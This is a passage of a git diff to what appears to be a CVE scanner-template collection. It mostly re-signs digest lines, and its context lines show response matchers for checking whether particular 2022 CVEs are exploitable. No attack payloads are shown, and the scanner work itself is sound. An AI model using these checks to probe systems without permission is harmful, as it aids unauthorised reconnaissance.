payment.")' condition: and - -# digest: 490a0046304402203e044022446742b837b66fecf52701a2f83ec58d79311545262507c8b35bec6202203abd92fa8acef7ba96fd6a042fb0d3b7f653e6135002831e4f70983e9e87164e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220301736f01fbbd2bcaeb30a6979148521b236af4b4a2be9eb0e817aaa59f9deca0221008230a3add2151682fba1f407310fad21563a102e66226108f501666f85d06c80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 0e21173d78..033922fefd 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022008e8412b4d17791fd29661d25c95c398dbb8711d6b30d4d9b8fc87bcd36c15010221008dc00cc1d63801f5db808931b8b998be171e5e9826dd48ab30d11af9b69f66ae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ffb8342eb941ae93e903a8e2338af1418da6f86bb7b0086c9abe1e1fa5fa12180220768f3b75814e4a6958418a3f6a381d3eebd3077e70e5678b530b22b93d8aefe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 0deae4c904..ca1f636b0d 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -47,5 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "badgeos-arrange-buttons")' condition: and - -# digest: 4a0a0047304502203c96374ed8ee78f5303b5f7a43b0c0975004a7c1b7b07556d4f047dec4ffba7d022100d7cd2998ca0f2b84f87284f9d2893c3c84ab1ccbc9eed98920f0285f35fe7dac:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022044d1f109237f788b6659ac28d1f6d4352a25561a9faaaec0dfa8fd8a0cff0a5802207d98a7eb98f87e99e95d4cb2ea9f42ca67105658c0705420b73e8d2e05ebfc39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 128ba19336..28f4ee0455 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -59,5 +59,4 @@ http: part: body words: - "Failed to write to /{{ranstr}}/index.html" - -# digest: 490a0046304402207dceb24d6c78f4d0184a6dc5d563d2e7e32fdd780f50a89bed98670ea993d7c802205d59d8366ed47740c6e4b633df47c2530888998cd32d717f461f6d2c14f41f3d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fd60b127e6a1a1b36a9b3ce2ffd4c9106e841965b81e452a656eb16a0df669ce022013fbe8578ea2d14d2a80d77591aaab27a695032819505436568f14b18f2ecd3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index b2afe10bd9..8781f0dad8 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Registred videos :")' condition: and - -# digest: 4a0a00473045022100bea681abb1e47c941b8bee9fee743ce6e3b98ab12fad0a896475daec496a9ecb022019c98bf2dcf8c6d737931840587ef9b41c1118956f4826cfcdf13900bd8cf5f2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b79d892eb3d984124f32334394eb9e0cb667c27c09444e34e812e446946155350220673e6b2df9da512afe3c77f266feb4713c9d1f6e9227c1e35977bceb29208a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index f00fe4adc2..fa2ef84cdd 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -45,5 +45,4 @@ http: - 'status_code == 200' - 'contains(body, "Account added successfully")' condition: and - -# digest: 4b0a004830460221008806c42c6cbbf6126653453ee34f528820e269eb52b721223c348b384bad1f36022100a041458f5edd83d640b1e25ae53d78884bf3450d71babacd90ec5e4dcf0df1ad:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de8b1201029ff489bcea1463e64dd60ace09307f6ebce726ec42bf423654cafe02210080b65f08488741e33f80a70f6eef6a89ed21a2b5eec5e28cb8d38b8e4ecea8ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index a83643d9df..3eb1c2cdd7 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -45,5 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")' condition: and - -# digest: 4a0a00473045022008044af3e9e40dbab2a3792e3a60fd15469b10c5026b64f5377526cf26e549ca022100f267a709843bdd3b5ebd1b56865839cda3f8bfb1e58e835618d689142f9354d3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ffdf553a0d17bb549e93c93369e4f4c1b31141e4b6b2ee02a62666e3e35b235502203c3d3f86103c96d3d5ead75223b5f7460935865e9d862d780ac1705b31c6383b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index aaf0b87e1a..08da442c3f 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bd2b2dbe58c729b9374f90a2e2ca5c0edbb4f0b72ac2aaa892ac752218d334b6022100d8d11614dc76a967f447bd99140331cbababa4a0c515d5069cc70f13a0df8e36:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008f0c42aa637a158b4e7b3ca95b80a1309e980c2969107a4f32b64e32e644b7e202207c2b84153656cc2b36a6e1670de0b187eef1e1d6f497a5b8d2216d1f819d4d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 1413c196da..76826674ce 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -50,5 +50,4 @@ http: - 'contains(content_type_1, "text/html")' - 'contains(body_2, "ArpPriceTable")' condition: and - -# digest: 4a0a0047304502210081520b76ae9ede23ff79bb274722ef3273901d4dcdbdfa7a8083e7aa4f45910d02206d251faf17842be9e4e7d01f8e7f22128fa513ce5a5ddf09100805e4a77e3ff2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ea66ed81ceb0164d51a4b21752d44d995b3505a7f5533a1b06b70ff97a61ee23022100ee330184488c47d277d01a46d7f48b1bdf9e0566decaf38f368d560d615e85e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index c0aa52a01d..2ca53b7710 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -40,5 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 490a00463044022012ea9b12c2b18dd0d5adbe846baa7e0fe2ff1048e0b10ae1e6c76b4f0e3c01df0220290afd04739e5e310e2091b791cc395ce83a097aa5d767af4e6274ffcb282cac:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ebdbbea677541bb21fa4589f7f5509ba0cde7e42e862280ce01ba54c6911336022100e9ec793b8d268bf22afced17abc4a6b2847c05df90107732d51c21492c82a95a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index d84725ff46..8c1ea408d5 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -76,5 +76,4 @@ http: regex: - 'name="_csrf" content="(.*)"' internal: true - -# digest: 490a00463044022010df973e957fa83b3bc5aa01db12cdeba3073d719c972eeb04b315d9aad31efc022044d6c5695c9d4b30bd71ee1bcb025e8eef0f8e8daf27c68f96307b738b4c3eae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100df2cf42714cb8995e78ffab2ca798fb50551746ffef36f2d17a1cf5a40127044022077c4eb9ca498a991243e8d178407ec791f6e2ea7c6700c0f6a786f785396141f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index 031af03a05..2dd2fb36ba 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -52,5 +52,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body - -# digest: 4a0a004730450221008cdde157049283e642cb34e0fadd321f2d9da9ba4176e1b59164dd74aa04f46702207f731bee06122d478d82f6338b2db0a969a1b278e6c0fc48ad966d53501a64b0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e590da24e8db64930f09cabcdc43cfcf808161ba91c0f5402eb366334eb3af20022100fe242867230bc4f99f3f081ad961b047cbd423302e19d364899701d8e6e92b1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 03cf6112a1..c5df753380 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -46,5 +46,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "All Snippets")' condition: and - -# digest: 4a0a004730450220759990517737404eedff750546b75f30798c556aeaf8c300bcb1fec41b853171022100fa7068968613fce50a77fff7189865703142507955e3c009cef4ccba3e7eb35f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201fd5b42caf095eb2dc04091e054fff1e1c49e3d98a73364b54341889585321b5022100e983704926b4ef427429d12a78a6dcd72c033bc1c238f5494e7e78116f3e39d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 86788f17b1..bdccd16407 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -59,5 +59,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_2 == 200 && status_code_3 == 200' condition: and - -# digest: 490a0046304402200a858328c51e9cd49880daa623fcbc4b083f8de3ee287220b5bea0cb8ffd9ea1022007faef131bad957f1e09b8c9dd9f51a6e406e2a5eab8ff3b590eb512a389ef0d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206497dfb695fd6bb14f4bcacb1509959030869cf553ea9e30db1ab9605d4c6748022100cad9f96c0ab1daa1c9f9b8fe0422e1c66ef199740ba92681aafd3d75dc0aa89a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index f44a708900..7dd2b84737 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -51,5 +51,4 @@ http: - 'contains(content_type_1, "application/json")' - 'contains(body_2, "olistener-action.olistener-controller")' condition: and - -# digest: 4b0a00483046022100e5d001258cc3c84cd1a614248c68b563ac3395e49211d9ba645465fde1411e0d022100ae0419b01cc7ec250ce2bea949d93b1f8ddd579a487d300e4abd9a51acb14c7b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201dd888cbbec4c7c36e8e8f3b1bdec059772dcd6c4af8b37acf7a30d7cd63fc2e022017d1381981d5dfc7dd145f319ad971f797b002294973d9a6a17ff23d3d312468:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 0f5df986bc..b02524cc7e 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -58,5 +58,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "commentform")' condition: and - -# digest: 4a0a00473045022100f62a69b682145e22c1ad8495b71562b529ef3bef15bf40d7369aa7d5e49b6a3e02202040aedf88e35e7692caba80caa596d211c8f9ec2590a325b705a8fa8150b728:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220173256c5f28250c2a66fab33c8b1239422ec975c4a05b4feab8659a739632505022100b0ab6c0399bf40f5750a54ef10e32df03ea6e591053e210446b82c0c4a67eeb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index 11fffa65a6..9f016fc96d 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -57,5 +57,4 @@ http: - "contains(body_1, 'users_can_register')" - "contains(body_2, 'default_role')" condition: and - -# digest: 4a0a00473045022075a2b3c80c2b9fc1ed3a5ac2ccdc03307608a1f2614a1cc1e38217fb1c69f47c02210081f3cc82fe462da5267482a5f89be3e590065b1869398c928f4811fb64c96a08:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220362709cd3f4c9cb72bd94e57abe97cf5dec17add2a116696e0de64ec47a249e10220461576ce02e822b6a44e424baa06ef324da73c712e03c4740e40e514d1e8b002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 67c866ac0d..51b0424593 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -61,5 +61,4 @@ http: - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and - -# digest: 4a0a00473045022100c1d91e5ace6c2f03ea5a6ae61bcbdc77cf293fb76850c98332871730d768334702203beb286ecc4c05d35084ea86d253868e4b2e145c1d2279559bcdb38e153239e7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009f5cc4c2a4e39c41b6d7ef8f4a77c5d7c675c2c7ad2a318b6b9b026a905e3b4202205e12ba165968d5f24d1cf0775ea119317a8dacf31b5256cb39034292850f726a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 8ceb44032d..df2a22dad5 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -74,5 +74,4 @@ http: - 'status_code_3==200' - 'contains(body_2,"bytes_uploaded")' condition: and - -# digest: 4b0a00483046022100ed344ccafc5ea80511057df93ab954b4b90dfefcb96ea32f57f4ce78a259911d022100d76a826a36d13b9c2e940051adf66ef8440a640c56e959c009e8da106cac6f72:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fc0b61e95585fded3e715bbf9b8d5b29f5713747f9ba2eee5a59e7070201126b0221009a1bc04b66e1f2a9d42d180c637db915699ba412f423c0ae804f7994d1fd8156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 538feb67e9..ebeeb2694c 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -81,5 +81,4 @@ http: - '"' - 'smartertrack' condition: and - -# digest: 4a0a00473045022100d5116b175b929d4f8eb686291a7dd1d0e940548b1f8765e2332476d6ce77f9e70220553f3b32642553aa41fa8a482fe097a67ccaad0afbad7816252ed34b92158bfc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022010a298124f1a67a3f0cd0f689e6074969365f5f7abef3c267aeef08fd8d5fa43022100bd4da40dfe837cc4a94c1a7debf05f90dbb3ef84e3054ac463939c765fec4d56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 2619e695be..08b1ab215b 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202424c6cf0823519272c6843979bac0b1013ed4e96492eaf7268d690b36c438ff02207099015ffdbb08e082ec7be484425b0aa36d2fa762d4fd5b2f2d36f5435196c1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008b33e28460453d75262d18aa40d79a59637534f00844ba094beb88803e63ec9d022100ea6a333e67cd6816f5afc9aeb075ccb4fc829e1466c1a1df0edea59f6d443bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index fa2da0ecf9..efadeb4a8d 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022071094f66c2c87f9d526580279d33be9b26eae4586f05c9056adc0563ce3e7d19022100c3820cf36ab0500e8d8f1ff3090fa1a2ceffab2f95fa9a9b080ffa89bec3fd42:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206c8d2c72a0ccd5e68e19b45156c690d16c7a24f1ed83c54365d15dc3af53842d022026f31edb4bd636ded238fdfb374609fc27743b56d4195fa91bbb4887f719740f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 6f56b2048d..ad9c049ff3 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -57,5 +57,4 @@ http: - '"BUILD_NUMBER":"([0-9]+)",' internal: true part: body - -# digest: 4a0a0047304502204cb8a9b5b80c83f47977ba1f0a31164e68f538b694ac4e56f25c32695f852131022100bee4ca3905a60aea5ea96899dc21f0a4a956d8775009ae69ef2dd476117e7f38:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b8166dc5543de005d8b1cec6071023479500626a893261c70bfdb5b668485a180220414b917a2354193faaa671b12c515f4baa5df65ca311454ab57f45ffbea9d4dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index b675b904f0..574f96d1af 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200c30dc9f339a50b6dd0266164bce39ac98e5a521e5c180f9f0c819b2980f39de022100e51e5ce3dc56e481b47a69b81461724588b1ec9b22c983bd5d456eb3ace39db8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d789feacc82da8f8a567b07ff9868f00d78e7a10a2b42f582b04c692d5bdf8ed022049aa25d4af9e7108360b664e97d57f51d1dda9d1dc9fa1e90c0835e1b6a5dc9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index 97f9b46d76..db2ec474ac 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -78,5 +78,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009455a97ec71e938692c5841013adc385427ffcbd0603af47894a3d5233090f2e022066fa4043041a51a61c8f57d38bd1f2642ab3c41f5163a9307d1fc74f63b1f867:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220275f8e79ad52e4aa406542ac158c1c5fb613db9452c1bb4075d088512fdf282f022100ac86e7894f12c98e24dc238625b4c4fca9c3cbba842b009b52a552384f477623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 8277c5f048..64f7e7929b 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -37,5 +37,4 @@ http: - type: word words: - "Interactsh Server" - -# digest: 4a0a00473045022100c2e076a8dd4528c86e62bb923c537a99801f4f02dd1c409efa2fb6614698d46e02201c800b3a0534c85e0545b6ec21f41e41752b3b00fa5d82953c54c541da97cb7d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fe8080b3b799bf61d19a6542854eec3c6b4c5bc32a1774e92fb530c680ea7d76022100abd28726674555a48b80eac94205f61a6e6783e44df808cf97e032c8e01197d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 53b83a9186..1a8cadef9e 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -58,5 +58,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201c2fca2fbcf5960ee8f332539e71f8c8a74842f0fafba4ba5ebeb2f21831729b022022ac7d60d987a9f4dcd39f0dc31e2a77e324d7e4f02dea1e78c373efc62e809f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207f3f1154eddb3873a316ca1bbe0f321fc4755bab11417f1d6c80e232fdb47d580220407c0b7b95a78efc42a81c316c1a5b9868ff7065d410def63a9cb0298298febd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 1f57b85744..2f7cb23cb8 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 500 - -# digest: 4a0a00473045022100e3ae42e2295dbc694a3855e2a76d632227b0c2b04b27ccf6c51c3ae1df70c1700220402c45878922ee3a9c2cd2ee271c989a9950ad75c1206fba6ec3a76e12c87b0b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207f75945f8a0a7b0b856b422c16fc88728547d52186aac24ea1c7e04f2b6de4b9022001ade1f10b6553a422a1af9d166d3285b9e412b2591cb0a226cda7617f348c9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 69a034344b..161d7668f3 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -46,5 +46,4 @@ http: part: header words: - text/html - -# digest: 4a0a00473045022100c759bb434de90e47798059fa33ef9cd21b44150c2e1e6c6d9f21fcde3409009b0220206aa05d84c26a45d7910e8312f14d89019aab59af1e7793726ad9ef6fa95c8d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008fed33804441580b64003fb688102fd41f0bca526755dc1a170400715f38a4240221009e726a67f4bedae9e7ae3ff2da21f3c578e3da735484b9ea1b3791d5c027efa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index c470ac79f3..a7d465b85a 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202a264235b62c9e0ce6aca8ffe4da67f348691e7926af53f1f129434e4d0282f102202495c13b7f32ec7a20555393364f2add7eb32c87c5c873e646e257275a87280d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e22fb1fbbb24983d05038c74a3842b4f6c0f1329deebf1b60ec24d9162a6fdc1022033eca97ea94e0e784384507a28d9b3ca1397ac21895a87df5cb400b1f9eb3af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index f4052ac414..df8e32aee7 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220019672b2d873bb4bb36aa3a2b9417d61f7b4ff1d00dce2c699c39d4ae0bd60eb022100fef92e2c22ffa0f421b949110e7f097f2e72e8eacba7de37b56c626534c5a41c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009ba4cd9659b2e2bc2fc97660098c271c1ac801de0f963ccdcf29e2e0906636dd02203af685836c7f786a3461047835f53c7f59acbb8f0e4a90b14b6afe3f4ae4862a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 34893e93da..cd10d21fea 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022012675341885159b411e1a87c0d4e5303df93d3c90a724a04f27a1f7b25af9fa502200f32813d3d3ca4ef53908efec6aed67b79af67a7987e37d420dd8a704d0657da:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200a2c845bbd53278698e486395bb46b2d4f681ebf87af9072eca4f319cfc98f2e022100ac8811dbadb6a7f85a37edcf5645ee0bc818f996a426ae4d427a79c09c540fe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index ad866b5d25..4a0e94ba00 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -50,5 +50,4 @@ http: part: header words: - "application/json" - -# digest: 490a0046304402202c59ed328d6cf282377faec2018850957094bd83a0d6e2bb60fe5b250b602c3702204481dfad18edfd89e79afd4285a55831f89a3dcd706078824627b89a58cb4476:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022066f60c190cc1a3b11a20878e2fced720551cdaaec06a0e8c9499524a88b37b4c0221009919420da1356e6b058e63d2d9abf921658a517834da280d0aa844bbd03ff2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index df68fe5237..7010d292e7 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -57,5 +57,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true - -# digest: 4b0a00483046022100b8babfcf61ee947c0292a29d80aba1156f2d16d1c90cd3493e62a42391e786ad022100a627e61e2974f0b98844219bc3ea659635a3f542e9e1d435dd330f9463384bff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022036e7f1e7dbf07a1689d3f55ab3c2670beecd3f146098f8cb8fd6d295b4cd1713022100a5089198a5a8280863254f7acd9bf76d29833403a9a59bc2dd0121b6eb18aa73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index c27100105b..e9e83c8b8e 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -56,5 +56,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true - -# digest: 490a00463044022073581d49bd1e6e844bda354f0d5d186bdc4815db752489f37c1b2a1c55b94ea1022044af22f6538314b9f38367e1de99c24c6e6da8c53424cc6ddee00c7db8d07ae9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b7d3157568f9a5d821dec79cf8063df029ae88dde31619e8b12eba88cf5cf358022067e2dee2183fcfbb93decff8be10c24a4c660e810379473e840a36fdd4877d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index 694e5ae3ae..437af9c162 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100dbb2a07ac9c6901893b57a832d465f3391ab03e74ed1bbfaa71c0c7487928ca0022100e5d56e045cb2df3cd4709eabe03430d8e474da41d319af0f1e1e6dc70c059dc3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210083ecda3f7fed320b914cecc3b3f9c7fb2c1e75b3a3708a71b62e6603d6cf2ec9022100cbe6341f0186342faab5f3cb79a1959224d3bae287ea6b99f429f510b608534f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index e9401c1cf3..3ee4582856 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 401 - -# digest: 